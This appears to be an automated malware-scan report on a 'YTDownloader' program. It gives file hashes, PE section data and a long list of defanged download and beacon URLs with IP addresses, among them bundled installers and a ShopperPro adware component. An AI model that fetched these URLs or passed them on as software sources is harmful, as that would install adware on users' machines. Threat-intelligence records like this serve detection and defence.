7ff5ab84b06a0e284ddc7f185a60f835	c:\Program Files\YTDownloader\DownloadAPI.dll
d2b30e82f34dddfc85eb487a1f1ed3b9	c:\Program Files\YTDownloader\DownloadHelper.exe
d5f7f16663b3638d8cf1947160957cf8	c:\Program Files\YTDownloader\Unelevate.exe
513b05b9d4cb113cdd48e1ad4fee6b20	c:\Program Files\YTDownloader\Updater.exe
c2529296d92b8acd56dc4de607316d0c	c:\Program Files\YTDownloader\YTDUninstall.exe
d3558f3effe5e158c0f206fb55357682	c:\Program Files\YTDownloader\YTDownloader.exe
3ba9d2548b8dda04d212be49375968ad	c:\Program Files\YTDownloader\converter.exe
fbb160d9fc7ba584b627e0267d0b8043	c:\Program Files\YTDownloader\libeay32.dll
e519f2bf8d35627aa8c712aa636f52ff	c:\Program Files\YTDownloader\rtmpdump.exe
5219d933b45905c337357f7e14bfee72	c:\Program Files\YTDownloader\sbmntr.sys
c0ca162d62aedd6e7d179ed6bc6c102e	c:\Program Files\YTDownloader\ssleay32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 2.11.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.11.0.999
File Description:
Comments:
Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	880527	880640	4.35082	d05e3f3c55a4d62abd5ff93646dd70b0
.rdata	884736	266750	266752	3.01239	8b8c28ae82f0019a3c3879914eaf6fa6
.data	1155072	25128	12800	3.18587	0969ae4b7e643447611d2430cf603989
.rsrc	1183744	244160	244224	4.40228	2f137d904da6cb386126ceba0aa4753e
.reloc	1429504	43400	43520	4.59114	c3dd6e178ffa5485ebb4b6096ab0d171

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/t.ashx?e=QgW8pN5r26ZQhScA1jb3TygKFoNUu98snvZi s3jtzEHqUQ0J3/4E35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9yWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn	198.232.124.192
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe
hxxp://dyd9qf154h76q.cloudfront.net/bxsdk32.dll	54.239.168.190
hxxp://d2bt1dcmxj05l2.cloudfront.net/ShopperProJSFull.exe	54.239.168.163
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/YTDownloaderFull.exe	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/4143.ashx?e=WL9usJOVMsOEyHZoFFyrCMo8YECNv9u2IULDxM1sNbYoHZkq4q5PhSAvELRpepitqGvv5sqhroDaM1aE/ClNTarMnJaQROuNQI32H5tXX1V1dA7x4KTM2T0tY TAasH KYX3Ti/i3YNNO4ethW6WjXT3HSH7IyY6iDaufm3fVolivtD1St2ps9NfeKQ69pBROdzeap4zJJInRbZ0JBsbGY IqCibN3ldP3GhIJ9WssI TdI1rDUfDKHsZyPUgteF21cA0rZRVWV1SYGELDwIeesStD0GefRo/lWo9flmWqj q 1vsNxArCdJPgv jLUJ5pdl3V4yoSZtC3ZUXmNv4hOEZ9fC9NN7s9C7tmmeIQ4UJj9eY3tRmk7I4yfJnN099XJYO ba2UwDaFJEA74lB0xM JMmHOf/CqmVamFpcHCY7SQZJ6CKD8QFo29WCpLsgxtpysupHCzhFkK8SQFPJhfGpa6r1ttomZQQFfz/kCGvtlCUNlcxdOHwPAKcUhuKm8Dhyvu4sbqxJOZ8KNNEpHtbIcwqzlLbphxpHgO p9SZw4YBH3MDkPlHiMBExjDPgZ11cIh4ppVhRq6Pt2o q0COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mhfCqXqcp6BQ=	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/8243.ashx?e=KC46TpkJIZwPgAd18hbyrqeDEU1sUvzGjvdcLv9L0ULeyzV7AofXltfeePK3juLQKseWc3Bk9ZvTgHNPDlEw6WvtcIuz9bMoDyhRDL0PLalNTvXaKqGxaNCUHeR8YCF3eHvRF2LX Yt4KY4qKL6xakY0/jJgtKj93ZGFjKBSR2Uc3UJd3 EpK1O5OFmHZj77IYJkUHHn0gezJt4fGRObk452zEuD36G9h9F6BDBmnZsxztg6 4zwmphq5YRs3Ua3kOLZWZ3INLBBsDkaVI3Au05hyv/H15jGnxEQ9afrbmB5Xe6ZTKO9HOaXZd1eMqEmbQt2VF5jb IThGfXwvTTe7PQu7ZpniEOFCY/XmN7UZpOyOMnyZzdPfVyWDvm2tlMA2hSRAO JQdMTPiTJhzn/wqplWphaXBwmO0kGSegig/EBaNvVgqS7IMbacrLqRws4RZCvEkBTyYXxqWuq9bbaJmUEBX8/5Ahr7ZQlDZXMXTh8DwCnFIbipvA4cr7uLG6sSTmfCjTRKR7WyHMKs5S26YcaR4DvqfUmcOGAR9zA5D5R4jARMYwz4GddXCIeKaVYUauj7dqPqtAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/4143.ashx?e=/k6kR j50toPgAd18hbyriN92MTUjJGOjvdcLv9L0ULeyzV7AofXltfeePK3juLQKseWc3Bk9ZuzkRknLc7vPTXtLJlO0tFfz3HjAX5f3Ms/caEgn1aywnSpt9GSHWXQ4vxs8gDHWj35Ej49ss4rhSCvw /qgeE3iD7FBwg AQLQrYmctKSd4 MAyIb7KmdHLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/4371.ashx?e=KC46TpkJIZznGREG7sgAN0XtTXOwAAQB GiFPuZHvEuAMRxV Cn6lnsc7hbJtTJH20qHT6WNWM4V 9m YgK2IM1ByjW6/OIJLhu0b45kiT YRPInKLFMVV2fkhc dP37s IILilpWF2OdsxLg9 hvYfRegQwZp2bMc7YOvuM8JqYauWEbN1Gt5Di2VmdyDSwQbA5GlSNwLtOYcr/x9eYxp8REPWn625g1Vvy4A7y/RZQgxJQH9ad8JiUTivpJXVuCem5QgWVR/ r2dENAO9U8huTN9bl7xIyhLCLnCNIzuSSxvf1LaKO02Vq4szTtsE4C/6/923Z7KlTShO4o6mGBRur7kRrGcu3PEkBHd/hkFLM2 CP1U3jg467erASHZytcpVawJQdFb6SZwJX EbI/7MF2srwrFHdS1y4M8tEnk/QcqVRQwl6EaplodKXZkksT6Afw4SPhoXS8SkOdDNy3vbOh EF3qdHMDplwmGJhuBVmfQJJ6u6IDCBM3PiwFRGLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw==	198.232.124.192
hxxp://rep.shopper-pro.com/app/ping.ashx?e=hNMAVKhukrxAU1hGZSx JO89WgGKzWAw62ls PLHCLDT03ZwnpMmrnnHkVEbFY2mhwr4VlWkO0yul9pd4H5jC0dQ5BPyXjjpaGsOh48yPAxgKkdlz1lRoRVZ6ImNImI0nDgs7q5vmXmt09Lyj4wnxzK4ON1tInGGgzaR8R5kiUwtv1FDNuuLGvDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWsFG5pEsdteceI9VTThLJ3UlF4mqrDXF/v6HzWHDR5YBjz 1atQERUN6CkfGpdw5qvq zYkkBMnThVOZjHwNmMDyjESsfx8vmmA9cYundBgRv3w3Jj7cm/ gp01/jAfMwbSGNlrViJV74d 8wlC3ACY1NLajJxa4x	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=hpY1rXLYst4U4POieyJ7k 86rkSdAtWAb9OMf6TV/k4icvsFwQStENB87jgWTbK/3s5q cLFxyxYWD4MTU1ewWDOfBCAJ7mB4JQT6LtkTMxpgmgCnlkE5FxzszKF363rsyHkc2rWtYboW0z9NLN4aF0Tp0k5o7ZtFU bNMpXPLEklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CSSNrM4iVH1I2Ld2YP2inphlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/DisnhnwjIznM4NjlRvaTpGfz3xhcJKC1Reo3n9s2Fs g80z0k6Cr9laSF2XrRbZnBny0uhv3iEz1ZNnAYhSLf3gsJzhYWVjeFKSrgJwIYPupgb31	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=hpY1rXLYst4U4POieyJ7k 86rkSdAtWAb9OMf6TV/k4icvsFwQStENB87jgWTbK/3s5q cLFxyxYWD4MTU1ewWDOfBCAJ7mB4JQT6LtkTMxpgmgCnlkE5DpohCDelrcGKwcR6VYInl/4c5idw7jB6Y8wSL48Ufj xLoT5lWMa/O51CUbXbhryEU5MDCXDxgXGTnwm6tWTnbG4u8zYbFhDmeeYhnV1BHp9KBlmzyr2/tIpl0LoUca0Y1U3rRkX6gIf7BoJXYNjZQ3hwdfJXYgb/UmU8pxp4SZEjkubKgXkCVysSIQM/WMqj6OkqhoAqzKCHIQkF 4wy/1OplaBX/JKxBlxZ9aXoUf91SyXt9 XnayBMUx nL2MUx5BBCvDUZ0U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOTzbANYrsS2gR3bXYBh5GayOJOBpub70rJsT 2HVkea/QSiZE4mNJCuIR62ArRLxq/lEuO9e0hYCneo /8EQQ7EaKr1l icJHo6jHoUXX2l omWJ/Ex9z3tzJVvURajp4qlUQ7Kz5asHZpCy29 Yy361S7rZnnZ2TU=	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=WVbe3wHlwMHKPGBAjb/btoHWA29bxdKW2YTeaOaZJPFysSIQM/WMqhsgZm851Wm705cEc0dFwLhTxWhzXOleYA8IGezBMfK jtneF477dPDU2Z1SyzBY81o8H6qezB8RqTFlxlzn4VKX1U8GGWeNj61SjtAHPTC3QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiYoYL3r 4idOA8Kj6Mu8v3vRYAGA yJTjkFE9hpSWZ9F0Ui/TCqSxnngK7X9N1SS09lwissX8oPDfQPHab7QXjtoXNw24za1vD4WpTRkXhg7nV3/LPfa2aq5oeRu5C4CqkWleu6Ut5wZJLhm4jKngLIPSVmnMg23wA=	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=aQQpsP6/AW3r A4x0AgNXRnacjZ2ZC2eBpXMF/9ZtDqRoZJTpqsyZxASc9FSZWyorVov04UjcEj6Cn6xgIPrOr0I8/BqvGRwjNnUrUd2W2BBPpL0iVh6pyYH9jylicula50u3XyigpVREcH6lvzpS5NOnjhl29VMiawHEBbFjHBAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF Jihgvev7iJ04DwqPoy7y/e9FgAYD7IlOOQUT2GlJZn0XRSL9MKpLGeeArtf03VJLT2XCKyxfyg8N9A8dpvtBeO2hc3DbjNrW8PhalNGReGDudXf8s99rZqrmh5G7kLgKqRaV67pS3nBkkuGbiMqeAsg9JWacyDbfAA==	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=eISsn0A7mAY luBT5UotGBnacjZ2ZC2eBpXMF/9ZtDqRoZJTpqsyZxASc9FSZWyorVov04UjcEj6Cn6xgIPrOr0I8/BqvGRwjNnUrUd2W2BBPpL0iVh6pxZtcNn99AarsNnFPWAXezz 6096XL0Cvyx7HHvLPT/w6yTTTmaviHdEQuSWecGyDcgBCn zqDbhQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiYoYL3r 4idOA8Kj6Mu8v3vRYAGA yJTjkFE9hpSWZ9F0Ui/TCqSxnngK7X9N1SS09lwissX8oPDfQPHab7QXjtoXNw24za1vD4WpTRkXhg7nV3/LPfa2aq5oeRu5C4CqkWleu6Ut5wZJLhm4jKngLIPSVmnMg23wA=	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=eISsn0A7mAY luBT5UotGBnacjZ2ZC2eBpXMF/9ZtDqRoZJTpqsyZxASc9FSZWyorVov04UjcEj6Cn6xgIPrOr0I8/BqvGRwjNnUrUd2W2BBPpL0iVh6pz0sajEdtXK5ho/QgOr9gQT2NRySioDRRrzTwCJRAS6WemyrrtcHnO0ys89o9QykRC5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VC51CUbXbhryEU5MDCXDxgXGTnwm6tWTnbG4u8zYbFhDmeeYhnV1BHpJkwA4PeZyrqoiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69	54.197.238.106
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/10464.ashx?e=N6dOqWm8Q97B 4EkIHdGPx9yD62njunZnvZi s3jtzEHqUQ0J3/4E35CmT3i5NSF2vIg0CxxvYrUQ6Ty4y6Z R17X6dr7mUHWLazpewXw1jSN3ZRr1JhaATxIUcsgQ w24gBuBZeJveENvzEMy06jHr1mKZNfZywG9b6mGOXRvU0PhvbfFCU5wZTviae3ZnOVQACmRxohL60BydAkNdgE315w3Deozjj VIgqrRR2hR0ybeGoyy0n/LTq3A5G0uD18dH0Dqne6k4zRLhdZdA1ySsz132oq8QKl4smjsDD39XRMVonhwTGQslZILdvQr54KSj0MjI2wAOfoRc4uCBkkbXj3l9p/R2FEpGUjaW8I9mY6rRsdtpLLQEpALS37pEwSIjyzpPyoezIqinufhL42iQ/B6B zkMckDtmZsgeoC4ODCFenjplP7OKerZvQn6FdevRVLuSh76 wRWAdkKOHpVpzwoowpD52/GDNr9om /EiQVMjk1ciSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJpHZ15mOZ7RI=	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=XOxRKBm2zlySwLUjiBbolbqTm/PoOtJmnvZi s3jtzEHqUQ0J3/4E35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9yWLazpewXw1jSN3ZRr1JhaATxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=obiBp3WOda WjDTOqhvSEco8YECNv9u2N4LE12xWIbsoHZkq4q5PhSAvELRpepitqGvv5sqhroDaM1aE/ClNTTua4Maub6eC74r1XQZFERIJ5AJXlBzFu09k8ckggnu0s IILilpWF3Y9uT/0042UzB0eIArPecdjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsMss0xdmNFlbg==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=QHucCbLl /ZGgpLO6W5H3hnacjZ2ZC2ezeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/Disnhn4e9d1WQpt2QRjjVcEy0WTW/eZlYKTDPukrgVX06CsIvOSmGLAMD/qTRcHKuVeTpZhKEBix7LJLFAL52sIXt4XqfcdyMZLOr1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBcZOfCbq1ZOdsbi7zNhsWEOZ55iGdXUEek=	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=p9HAq5TtKa9F7U1zsAAEAbFP3xsPDpAtgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsmxP7YdWR5r9BKJkTiY0kK4P1EuvY4ytw35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9y1QHs3X92ilG rUXTCO4f7ymF904v4t2D1j0SFQEi Sk bZ05DPuxeAWhabtZUG1f8n8JlmuEfM5AjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3UlF4mqrDXF/v6HzWHDR5YBjz 1atQERUHYGhmNDoUgj	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=QHucCbLl /ZGgpLO6W5H3hnacjZ2ZC2ezeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/Disnhn4e9d1WQpt2QRjjVcEy0WTW/eZlYKTDPukrgVX06CsIvOSmGLAMD/qTRcHKuVeTpZhKEBix7LJLFAL52sIXt4UiHBOm9AZr4oT70GRW6LxXQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd1JReJqqw1xf7 h81hw0eWAY8/tWrUBEVB2BoZjQ6FIIw==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=QHucCbLl /ZGgpLO6W5H3hnacjZ2ZC2ezeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/Disnhn4e9d1WQpt2QRjjVcEy0WTW/eZlYKTDPukrgVX06CsIvOSmGLAMD/qTRcHKuVeTpZhKEBix7LJLFAL52sIXt4UXMdeVS0aoyhhkHgG1sdzXjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWm5xtDBkuzBZw==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=QHucCbLl /ZGgpLO6W5H3hnacjZ2ZC2ezeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/Disnhn4e9d1WQpt2QRjjVcEy0WTW/eZlYKTDPukrgVX06CsIvOSmGLAMD/qTRcHKuVeTpZhKEBix7LJLFAL52sIXt4XyrUF6vpeaSi3QPqxzrS768NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWPBPXCvXWBO7Og5HenfaRfIk2AsvfRpeBPl2Ah9DV9msw==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=QHucCbLl /ZGgpLO6W5H3hnacjZ2ZC2ezeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/Disnhn4e9d1WQpt2QRjjVcEy0WTW/eZlYKTDPukrgVX06CsIvOSmGLAMD/rEEASnTAt8o5xcz3vxGu/GBPEhRyyBD7DR614fwrEG1qQdf661A7a3sYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/DisnhoTNSIcb2Uyc	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=p9HAq5TtKa9F7U1zsAAEAbFP3xsPDpAtgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsmxP7YdWR5r9BKJkTiY0kK4P1EuvY4ytw35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9y1QHs3X92ilHPsYeJ7guqL3mQKhyBoITNs IILilpWF01K6uMI0cA8T/6N1hLWbnhG8n8BszUgZilnVC2xOWZar4DMAjReMo1Dlhnwcw2uNF8sq9pbsMIcG8xh rHuvvYa6hudO5b bOfKYKFCWV2wLsE5O/F8CjpTUO7heB bthMUP0yyU4VodidK03d0MuzZPHJU0qA9vA9GanF1RNNmMzXUezINFlsIV5dJNE8xQtEL6kO6MAPPRk3pYsWha92dV1 PcKMtTouTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45BRPYaUlmfRdFIv0wqksZ51Sl9Z6VLx I	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=QHucCbLl /ZGgpLO6W5H3hnacjZ2ZC2ezeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/Disnhn4e9d1WQpt2QRjjVcEy0WTW/eZlYKTDPukrgVX06CsIvOSmGLAMD/rEEASnTAt8o5accpdDgHJP0JQd5HxgIXdwgIjv 1CV6Nl6iMSCUoXjJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMjGZvvKsaXqK	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=iDRrwQhh7wtmS6nlSU/NTqG835x4//T1aMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWlSma92QTn2sr7GRIcOoydhUdGPD1b2Qs4eR0 6Iti9nqGVWRcbUjPZ333RAvM0VMA8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpVrvBOGo5I8L8Nh3QJEALW3QkFjibRkaLmSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYNdcr9M9goCFnm437Rwp3ALYLGwKvXHzIxmb7yrGl6ig==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=NVqRyNkruopmS6nlSU/NTtC5z6b84PNjaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWlSma92QTn2sr7GRIcOoydhUdGPD1b2Qs4eR0 6Iti9nqGVWRcbUjPZ4nJwzEzT2yHUh 3ZGDmdW5pZis9f nTdYbLHhfVyhq lO9bNCiNu fEiQPnfm1ghyUwNKDHkjDONmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVZZXXlPOL JdxOsvBqt15abnG0MGS7MFn	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=s5Ydxb c7o0DbDSBvTK 4Hq5aL5HWExgAZx7JfD/ZiNA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY8E9cK9dYE7s6Dkd6d9pF8iTYCy99Gl4E9Wqh4iojbHdqGvv5sqhroDaM1aE/ClNTTua4Maub6eCsivMaAupUnTb/7 kcvPCjjpeJfJMiPTs0JQd5HxgIXd/dqaEYXgO79I32qLmgkBzr0Y7vf0dioHxIkD535tYIazisLfVFTLWX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YFxk58JurVk52xuLvM2GxYQ5nnmIZ1dQR6Q==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=QgW8pN5r26avTpvRFjYpwu86rkSdAtWAg1Nc7SorC5g2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3UlF4mqrDXF/v6HzWHDR5YBjz 1atQERUImrWWmth9mv19548reO4tAqx5ZzcGT1m31ic5SsWMkM1L54qt7q ktgKkdlz1lRoVNSQ3lQpjLdBPEhRyyBD7DFByCWgHBKY9pECjYyPqxFWhkxzW5UAih1MPbAZPL 765ERpoYpkeHQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd1JReJqqw1xf7 h81hw0eWAY8/tWrUBEVB2BoZjQ6FIIw==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=EYAmqppYZO/KPGBAjb/btiFayG35BvjuKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOQUT2GlJZn0XRSL9MKpLGefSEibtKK7eEerVyaMS1AoBVcsZgjOTLBh8qNJTPfve0LwUfFNexyObdfeQRNwvtN83SQCeXx1TCLUISLCJlFqul4CnWC C4vHQ5iZIM1e7BHRbglB1j0/SAHLkS0Ky9Ro11N66AH6x9ECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndSUXiaqsNcX /ofNYcNHlgGPP7Vq1ARFQdgaGY0OhSCM=	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=QHucCbLl /ZGgpLO6W5H3hnacjZ2ZC2eoiejxERrnrFXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/Disnhn4e9d1WQpt2QRjjVcEy0WTW/eZlYKTDPukrgVX06CsIJl8f63dS690bGtOpbXm9kB1gsLoXCDzZ0JQd5HxgIXdu8CclOBY6oY2PcoHI rJuU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0aergfKagB5OmVixU3rc7xpy wbvfw4rJ4aEzUiHG9lMnA==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/4371.ashx?e=aonlVHCKlbW/q1OYm6RuNkXtTXOwAAQBFz/kTxtz4H2AMRxV Cn6lnsc7hbJtTJH20qHT6WNWM4V 9m YgK2IM1ByjW6/OIJgFOqBGDQz2QLLlTUMpAFH/UeuO5g99mU0JQd5HxgIXcuIFNHGco112LUJGnTsXhlEK5u6pECdO1SxiNrRjAGZBB5aSy JFSF9m16s50GsHEey68r 4NN8dFOe7J001QKjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsMss0xdmNFlbg==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=/Fcwh0Xd/M1mS6nlSU/NTtC5z6b84PNjaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWlSma92QTn2sr7GRIcOoydhUdGPD1b2Qs4eR0 6Iti9nqGVWRcbUjPZ4nJwzEzT2yHUh 3ZGDmdW5pZis9f nTd2uwjb78QzN C k Oyp7Z NfvhxWb41huXuRoGH96TSjE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KybE/th1ZHmv0EomROJjSQrgPyvVweGBaX	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=AZwPyJy3TZh4HRn2UIUeHl8CgumqG7h nvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqo UCJoj6Xc7ysGpf6P3fSEGTHC6fNrU58xq68k2LWb8n h s/5eh5o4G r 3F6T7jEgyVLifOtmURddPycjeHI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VlldeU84v4l3E6y8Gq3XlpucbQwZLswWc=	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=XJYuqQQo69eJxiP7f9a/G0XtTXOwAAQBMu9XWFgdApmAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KybE/th1ZHmv0EomROJjSQrg/US69jjK3DfkKZPeLk1IXa8iDQLHG9inCtSd9DvDByFsXwpAaO73IYrkTZsU4NhsmfUZ6AggvI6ysdmxGwh8xGGDRZSzPReXL8vnWIdn2vk3V4Bt3e3S5OXRJ8cVOxp8ccBfhg1MGPQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd1JReJqqw1xf7 h81hw0eWAY8/tWrUBEVB2BoZjQ6FIIw==	198.232.124.192
